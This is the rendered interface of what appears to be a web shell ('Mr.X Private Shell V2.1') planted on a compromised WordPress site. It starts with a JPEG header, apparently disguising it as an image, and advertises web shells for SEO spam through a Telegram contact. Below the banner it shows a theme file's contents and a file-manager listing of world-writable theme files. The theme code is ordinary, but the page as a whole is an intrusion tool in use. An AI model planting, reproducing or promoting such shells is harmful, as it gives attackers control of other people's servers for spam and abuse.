����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
add_action('after_switch_theme', 'konstruktic_starter_settings');
function konstruktic_starter_settings() {
if (!get_theme_mod('osf_starter_settings', false)) {
$content = wp_remote_fopen(get_theme_file_uri('assets/data/settings.json'));
if ($content) {
$content = json_decode($content, true);
if (isset($content['thememods'])) {
foreach ($content['thememods'] as $key => $mod) {
set_theme_mod($key, $mod);
}
}
}
set_theme_mod('osf_dev_mode', false);
set_theme_mod('osf_blog_archive_style', 1);
remove_theme_mod('custom_logo');
set_theme_mod('osf_starter_settings', true);
}
}| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| admin | Folder | 0755 |
|
|
| back-compat.php | File | 1.91 KB | 0777 |
|
| class-main.php | File | 14.84 KB | 0777 |
|
| class-sidebar.php | File | 1.99 KB | 0777 |
|
| starter-settings.php | File | 743 B | 0777 |
|
| template-functions.php | File | 18.93 KB | 0777 |
|
| template-tags.php | File | 5.57 KB | 0777 |
|
| tgm-plugins.php | File | 2.44 KB | 0777 |
|
| theme-custom-css.php | File | 512 B | 0777 |
|